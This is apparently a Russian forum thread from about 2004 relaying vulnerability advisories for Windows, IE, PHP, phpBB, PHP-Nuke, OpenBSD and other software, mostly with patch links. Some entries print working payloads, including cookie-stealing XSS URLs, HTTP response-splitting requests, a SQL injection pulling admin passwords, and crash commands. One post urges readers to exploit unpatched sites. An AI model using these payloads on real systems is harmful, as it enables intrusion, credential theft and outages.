Итак, начал я его собственно из-за первой баги:
Программа: Ethereal 0.8.15-0.10.4
Опасность: Высокая

Наличие эксплоита: Нет

Описание: Несколько уязвимостей обнаружено в Ethereal в the iSNS, SMB, и SNMP диссекторах. Удаленный пользователь может аварийно завершить работу Ethereal процесса и может выполнить произвольный код на целевой системе.

1. Уязвимость в iSNS анализаторе позволяет аварийно завершить работу Ethereal или выполнить произвольный код на системе.

2. Уязвимость в SMB анализаторе позволяет удаленному пользователю аварийно завершить работу приложения, когда включена SID snooping и не определено имя политики для обработчика.

3. Уязвимость в SNMP анализаторе может использоваться для аварийного завершения работы приложения через специально обработанную community сторку.

Описание: Отказ в обслуживании обнаружен в Apache web server с PHP. Локальный пользователь может вызвать условия отказа в обслуживании на Web сервере.

Следующий PHP код приведет к нестабильной работе Apache Web сервера и, в конечном счете, аварийному завершению работы программы:

<?
fopen("http://[target]/loop.php","r");
?>

Патча пока нет.

Уязвимость обнаружена в Microsoft Internet Explorer в popup.show(). Удаленный пользователь может выполнить произвольные действия мышки на целевой системе

Удаленный пользователь может создать HMTL, который использует функцию popup.show() с 'on mousedown' событием, чтобы выполнить различные действия мышки на целевой системе пользователя. Пример: http://freehost07.websamba.com/greyhats/hijackclick3.htm

Эта уязвимая функция может использоваться вместе с уязвимостью в "shell://" обработчике, чтобы выполнить произвольный код на целевой системе пользователя. Пример:

<img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>
location="shell:favorites\\greyhat[1].htm"

Пример/Эксплоит: http://www.malware.com/paul.html

Патча пока не существует.

А сей час крупный багтрак по винде! Некоторые уязвимости носят статус критических!
--------
Уязвимости в различных версиях Microsoft Windows позволяют злонамеренному Web сайту скомпрометировать уязвимую систему.

1. Проблема в обработке специально сформированного showHelp URL позволяет выполнить произвольный код в Local Security Zone.

2. Еще одна уязвимость в HTML Help позволяет выполнить произвольный код ан системе пользователя, если текущий пользователь имеет административные привилегии.

Уязвимы все версии Microsoft Windows, использующие Internet Explorer 5.5 SP2 и 6 SP1.

Решение:

Microsoft Windows 2000 (SP2, SP3 and SP4):
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP (SP1):
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-Bit Edition:
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows XP 64-Bit Edition Version 2003:
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003:
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows Server 2003 64-Bit Edition:
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows NT 4.0 SP6a (with Internet Explorer 6.0 Service Pack 1):
http://www.microsoft.com/downloads/details...&displaylang=en
---------
Уязвимость во всех версиях Microsoft Windows позволяет удаленному Web сайту выполнить произвольный код на системе пользователя.

Уязвимость связана с функциональностью Windows Shell. Удаленный пользователь может создать специально обработанный HTML документ, который, когда будет загружен целевым пользователем, выполнить произвольный код на локальной системе. Для эксплуатации уязвимости требуется некоторое взаимодействие с пользователем.

Microsoft не опубликовала обновление для Windows 98/Me.

URL производителя: http://www.microsoft.com/technet/security/...n/MS04-024.mspx

Решение:Установите соответствующее обновление:
http://www.microsoft.com/downloads/details...&displaylang=en (для английской винды XP Sp1. для остальных сами ищите)
------
Уязвимость в Internet Information Server позволяет злонамеренному пользователю выполнить произвольный код на уязвимой системе.

Уязвимость связанна с переполнением буфера при обработке постоянных редиректов. Уязвимость может эксплуатироваться через чрезмерно длинный, специально обработанный URL.

URL производителя: http://www.microsoft.com/technet/security/...n/ms04-021.mspx

Решение:Установите соответствующее обновление:

Microsoft Windows NT Workstation 4.0 (SP6a):
http://www.microsoft.com/downloads/details...&displaylang=en

Microsoft Windows NT Server 4.0 (SP6a):
http://www.microsoft.com/downloads/details...&displaylang=en
-------
Уязвимость в Microsoft Outlook Express 6 позволяет злонамеренному пользователю вызвать отказ в обслуживании.

Уязвимость связана с ошибкой при проверке email заголовков. В результате можно аварийно завершить работу Outlook Express при просмотре специально обработанного email сообщения.


URL производителя: http://www.microsoft.com/technet/security/...n/MS04-018.mspx

Решение:Установите соответствующее обновление:

Microsoft Outlook Express 5.5 (requires SP2):
http://www.microsoft.com/downloads/details...&displaylang=en


Microsoft Outlook Express 6:
http://www.microsoft.com/downloads/details...&displaylang=en


Microsoft Outlook Express 6 (requires SP1):
http://www.microsoft.com/downloads/details...&displaylang=en


Microsoft Outlook Express 6 (64 bit Edition with SP1):
http://www.microsoft.com/downloads/details...&displaylang=en


Microsoft Outlook Express 6 on Windows Server 2003:
http://www.microsoft.com/downloads/details...&displaylang=en


Microsoft Outlook Express 6 on Windows Server 2003 (64 bit edition):
http://www.microsoft.com/downloads/details...&displaylang=en

Опять бага в IE:
Уязвимость в Microsoft Internet Explorer (IE) позволяет удаленному пользователю выполнить произвольный код сценария в домене безопасности произвольного сайта.

Пример:

<script>
var var1=location.assign;
alert("Assign function of the current window:\n"+var1);
var w=window.open("about:blank","_blank");
var var2=w.location.assign;
var w=alert("Assign function of the new window:\n"+var2);
w.close();
</script>

Пример/Эксплоит: http://freehost07.websamba.com/greyhats/si...odnameredir.htm
------
И серьезная уязвимость в PHP (правда не новой версии)
Уязвимость обнаружена в PHP, когда компилирован с включенным параметром 'memory_limit'. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может представить специально сформированный HTTP POST запрос, чтобы перехватить процесс выделения памяти пока Zend HashTables выделяется и инициализируется. Удаленный пользователь может представить специально обработанный HashTable destructor pointer и выполнить произвольный код на целевой системе.
Решение - устнавить 4.3.8 или 5.0

2All: сегодня не очень хороший, но возможно кому-то(имеющим свои сервера/сайты) полезный багтрак:
----
Отказ в обслуживании в PureFTPd позволяет удаленному пользователю аварийно завершить работу FTP сервера.

FTP сервер аварийно завершит свою работу, когда достигается максимальное количество подключений.
Установите новую версию программы (1.0.19): ftp://ftp.pureftpd.org/pub/pure-ftpd/
---- С очень страшной формулировкой первой фразы
Уязвимость в Linux ядре в эквалайзере балансировки нагрузки для последовательных сетевых интерфейсов. позволяет локальному пользователю аварийно завершить работу системы.

Локальный пользователь может вызывать функцию eql_g_slave_cfg() и eql_s_slave_cfg() и представить не существующее имя slave устройства, чтобы аварийно завершить работу ядра.

Уязвимость расположена в 'drivers/net/eql.c'.
Патч доступен тут: http://linux.bkbits.net:8080/linux-2.6/cse...MLr0eJAXMxHcNZg

----
Ошибка в PHP фоурме. Sql- injection.
Пример:
http://forum.hnet.ru/viewtopic.php?t=[NUMBER HERE]&highlight=Bug,SELECT * FROM $table (все одной строкой)
----
Еще пара уязвимостей в PHP в версии 4.3.7-rl и предыдущих. Советую обновить php до 4.3.8 - 5.0

Несколько уязвимостей.
---
В Apache:
Уязвимость форматной строки в mod_ssl позволяет удаленному пользователю выполнить произвольный код на целевой системе пользователя.

Уязвимость может эксплуатироваться в случаях, если Apache Web сервер используется как прокси и представлен HTTPS URL типа 'https://foo%s.example.com/ и имя хоста 'foo%s' существует в 'example.com' зоне. Уязвимость расположена в запросе сообщений об ошибках в 'ssl_engine_ext.c'.
(надо же, а я такую фичу на сайте одной брокерской конторы видел, жаль, но ее уже исправили там )
Установите обновленную версию программы: http://www.modssl.org/source/mod_ssl-2.8.19-1.3.31.tar.gz
---
Лажный форум phpBB опять радует админов своими багами.
http://localhost/phpbb208/index.php?category_rows=waraxe
http://localhost/phpbb208/faq.php?faq=w araxe
http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe
http://localhost/phpbb208/profile.php?mode...ranksrow=waraxe
http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
<pre>
2. XSS:
<pre>
B1 - XSS in "index.php":

http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);
</script>&category_rows[0][cat_order]=99


B2 - XSS in "language\lang_english\lang_faq.php":

http://localhost/phpbb208/faq.php?
faq[0][0]=f00<script>alert(document.cookie);</script>bar&
faq[0][1]=waraxe


B3 - XSS in "language\lang_english\lang_bbcode.php ":

http://localhost/phpbb208/faq.php?mode=bbcode&
faq[0][0]=f00<script>alert(document.cookie);</script>bar
&faq[0][1]=waraxe

Так что, дорогие админы, неделю назад поставившие версию 2.0.8а, теперь ставь те версию 2.0.9
---
Не менее лажный движок так же радует админов работой:
Несколько уязвимостей в PHP-Nuke позволяют удаленному пользователю выполнить SQL команды и XSS нападение.

1. SQL инъекция:

http://localhost/nuke73/modules.php?name=S...&type=comments&
query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

2. /modules/Search/index.php' не фильтрует HTMl код в поле поиска.

Способов лечения уязвиомсти пока нет, так что юзать не переюзать все это на просторах рунета...
---
Ну и достаточно неинтересная и врят ли кем-нибудь в будущем используемая ошибка в Mozzila:
Отказ в обслуживании обнаружен в Mozzila в импорте сертификатов. Удаленный пользователь может незаметно импортировать некорректный root сертификат, вызывая условия отказа в обслуживании для SSL подключений.

Удаленный пользователь может послать специально обработанный email, чтобы заставить злонамеренный сертификат перезаписать встроенный certificate authority (CA) root сертификат на целевом браузере пользователя. Злонамеренный сертификат должен иметь тоже самое distinguished имя, что и целевой CA root сертификат. Это приведет к сообщению об ошибке (error -8182) при попытке целевым пользователем посетить https url.

Уязвимость может эксплуатироваться через специально обработанное e-mail сообщение через 'application/x-x509-email-cert' MIME тип или через Web страницу (например, используя IFRAME тэг).

Патча пока нет, да и кому он нужен от нее?!

Нах все это в инете есть куда более подробная отсортированная инфа, эксплоитами и патчами а также не общими словами уязвимость бла бал,а контретным описанием бага, к чему это все тут??????????

Посмотри кол-во просмотров темы. Если смотрят - значит надо. Дважды мне репутацию подняли за багтрак - значит опять же надо. Не у всех есть инет, не все знают где хороший багтрак. Тебе не нравится - не смотри.
P.S. А нахера наша сеть вообще нужна если в инете все есть, а?

Вот так и ответь, для репутации

не для репутации(хотя это тоже, не буду спорить). Я про репутацию сказал, чтоб показать, что людям она нужна.
P.S. Давай лучше перейдем куда-нить еще, если будем продолжать, чтоб тему эту не захламлять.

Товарищи, напишите, на какой софт нужны уязвимости - буду их писать, чтоб весь багтрак сюда не лить.
Пока в моем списке: браузеры Mozila, Opera, IE, ProFTP Server, Windows NT, Linux, FreeBSD.

P.S. Сегодня были найдены ошибки в php-nuke и в phpBB forum, а так же в IkonBoard forum (это владельцам своих сайтов).

Ну ка ну ка про форумы поподробней плз

Уязвимость в phpBB позволяет удаленному пользователю выполнить XSS нападение.

1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример:

http://SERVER/phpBB2/search.php?search_aut...</script>

Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf). Удаленный пользователь может отравить Кеш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса:
POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129

logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT
P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!

Еще пример:

GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d
%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Host: SERVER

Так что, товарищи, которые пару дней назад версию 2.0.9а - ставьте версию 2.0.10 и опять ее настраивайте
----
Про Ikonboard уже не нашел...

ВСЕМ ПРИВЕТ!!!
Фантомас, я свою сетку не хакал и не собираюсь. И вообще я ламо жуткое и полное.
Манджари, а ты кто такой(ая) будешь, что знаешь где я, кто я и что я? =)
Кстати, а вообще-то не хорошо указывать, если знаешь где я был, вдруг бы вот, например, Фантомас, прочитал, что меня в городе нету и темной ночью обокрал?
Багтрак жив и будет жить, вот щас только отойду, а то я это сообщение в полсмертном состоянии пишу. =)

Сори, что твои секреты раскрыла, в следующий раз буду думать...
Извиняй...

Ещё, кстати , извини что в твоей теме нафлудили....Если что, можно ведь исправить....
-------------
Исполнено
Fеnикs

Так, за последние дни я нашел только один стоящий баг. Да и то, только админам полезный.

Отказ в обслуживании обнаружен в OpenBSD в обработке ICMP пакетов в конфигурации моста. Удаленный пользователь может вызвать панику ядра.

В конфигурациях, в которых целевая система конфигурирована как шлюз с включенным IPSec и выполняет функции моста, удаленный пользователь может послать одиночный ICMP echo request пакет из одной сети моста в другую, чтобы аварийно завершить работу системы. Если установлена опция DDB_PANIC, система будет автоматически перезагружена.

URL производителя: http://www.openbsd.org/

Решение:Исправление доступно через CVS: /cvs/src/sys/net/if_bridge.c
Патчи можно скачать тут:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/028 _bridge.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches...16_bridge.patch

И эксплойтик (на всякий случай...): Hi, I have posted this vulnerability note to CERT and gotten no
response. It is remotely exploitable, but since it requires commands

to be executed as root on the gateway machine, it is unlikely to cause

any unplanned disruption.

OpenBSD was contacted, and they provided a patch within 12 hours.

-=-=-=-
Description
-=-=-=-
An OpenBSD 3.5 machine, configured as a gateway (2 NICs --Net A,
and Net , once bridging has been activated, and the link2 option
given (for IPSec processing), is vulnerable to a single ICMP echo
request sent from a machine on interface A's network sent to a machine

on interface B's network, causing it to crash. No core file is
generated. If the DDB_PANIC option is set, the machine reboots upon
receipt of the ICMP echo request.
-=-=-=-

Commands (assuming fxp0 and fxp1 are the two interfaces):

# ifconfig bridge0 create
# brconfig bridge0 add fxp0 add fxp1 up
# brconfig bridge0 link2

the machine is now vulnerable to a single ping from a machine on NetA

destined to a machine in NetB.

The problem was observed on a test network, and reproduced on a VMWare

network. Screen-shots of the crash on the VMWare setup are available.


OpenBSD's patch follows.

'='='=' Begin Patch ='='='= Remove this line '='='='

Index: sys/net/if_bridge.c ===================================================================
RCS file: /cvs/src/sys/net/if_bridge.c,v
retrieving revision 1.136
diff -u -r1.136 if_bridge.c
--- sys/net/if_bridge.c 21 Jun 2004 23:50:36 -0000 1.136
+++ sys/net/if_bridge.c 18 Aug 2004 09:29:04 -0000
@@ -2275,9 +2275,9 @@
splx(s);
return (1);
} else {
+ splx(s);
skiplookup:
/* XXX do an input policy lookup */
- splx(s);
return (0);
}
} else { /* Outgoing from the bridge. */


'='='=' End Patch ='='='= Remove this line '='='='

cheers,

Vafa Izadinia.

Владельцам ws_ftp серверов посвящается.

Advisory Name: WS_FTP Server Denial of Service Vulnerability
Release Date: 08/30/2004
Affected version: WS_FTP Server 5.0.2
Author: lion

Overview:

A vulnerability has been found in WS_FTP Server. The problem \
is in the module of file path parse will cause FTP server to \
consume large amounts of CPU power.

Exploit:

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.

Что-то неурожайно начинается новый сезон. Баг находят на самом деле щас много, но все в программах не очень частовстречаемых(всякие там Ешефт ftp server и пр.).

Linux Kernel 2.4, 2.6
Опасность: Высокая

Наличие эксплоита: Нет

Описание: Целочисленное переполнение буфера обнаружено в kNFSd. Удаленный пользователь может аварийно завершит работу целевой системы.

SuSE предупреждает о нескольких целочисленных переполнениях в kNFSd и XDR функциях декодирования в Linux 2.6 ядре. Удаленный пользователь может послать пакет с доверенным адресом источника, который содержит запрос на запись с размером, который больше чем 2^31 чтобы вызвать панику ядра.

Неизвестно, может ли уязвимость использоваться для выполнения произвольного кода. Также сообщается что локальный пользователь может вызвать отказ в обслуживании через /dev/ptmx на Linux 2.6 kernel.

Такс, сегодня нанесем удар по владельцам фаерволов с филина (так вам и надо =)
Начнем с баги в Kerio Personal Firewall. Не очень серьезная, но, если у Вас уже есть троян или запущенный вирус, он может обойти фаервол и проникнуть в сеть. Рекоммендуется поставить новую версию.

И теперь крупная бага!

На днях была изобретена новая техника для обхода персональных Firewall'ов. Демонстрационная программа Backstealth, недавно размещённая на Packetstorm, обходит фильтры на исходящий траффик и скачивает текстовый файл с веб-сервера, не привлекая внимания Firewall'ов Symantec, McAfee и других фирм, а как известно, файрволы такого класса обязаны останавливать любую программу, желающую попасть в сеть.
страница разработчика - http://piorio.supereva.it/backstealth.htm
Как заявляет разработчик программы Paolo Iorio, сетевые соединения установленные таким образом незаметны для многих брендмауэров, так как они оперируют в памяти, выделенной для самих Firewall'ов.

По заявлению автора программы, утилита способна обходить запреты на исходящие соединения таких файрволлов как Kerio Personal Firewall, McAfee Personal Firewall, Norton Internet Security 2002, Sygate Personal Firewall Pro и Tiny Personal Firewall.

Iorio подчёркивает уникальность своего произвеления, т.к. утилита не цепляется к "доверяемым" программам, а лишь использует Windows-функцию VirtualAlloc для добавления собственного кода в память выделенную для Firewall'а.

Интересно, но это позволяет отправлять любой трафик хакерам на любую службу, закрытую фаерволом, минуя его. Самым страшным является то, что исходный текст программы уже доступен на сайте разработчика и в ближайшее время будет переписан в куда более вредоносную программу.

Так что все, кто ставил фаервол до 5-ого сентября на свою глючную виндозу - переустанавливайте на новую версию.


Так, ну и в заключение хочу сказать, что было найдено еще 3 ошибки в PHP-nuke (движок сайтов), так что если ваш сайт стоит именно на нем, немедленно ставьте патч.

makt_liCh а как ты относишься к Икспишке которую недавно выложили?В ней стоит встроенный файрвол,стоят все заплатки которые когда-либо выпускались Microsoft + SP2?

Отношусь хорошо, если она сама встала. Знаю кучу людей, у которых начались ошибки после установки сервис пака, но вообще хорошо. Только там не фаервол встроенный, а брандмауэр. Большой разницы нет, но последний настраивается хуже (меньше возможностей).
Я вообще считаю, что обычным пользователям не нужны фаерволы. Надо только заплатки вовремя ставить и все.

Все замечательно.
Только у всех этих вскрывалок файерволлов есть одна особенность:
Они пишутся авторами специально для определенных типов файерволлов, т.е. индивидуальная настройка (как бы сказать - поделка на заказ).
Второе: Нигде нету теста того, что программа смогла пройти файерволл ИЗВНЕ.
Вместо этого нам предлагают "если у вас уже есть троян".
Как известно, мы, чуть более продвинутые пользователи, одним файерволлом не ограничиваемся. У нас стоит всегда еще Антивирус сверху, с вовремя обновляемыми базами.

А эти тесты про особые места памяти файерволла - вообще смех, ибо, если у тебя уже есть троян, то без особых выкрутасов можно туннелировать через IE посылку на требуемые сервера нужной информации.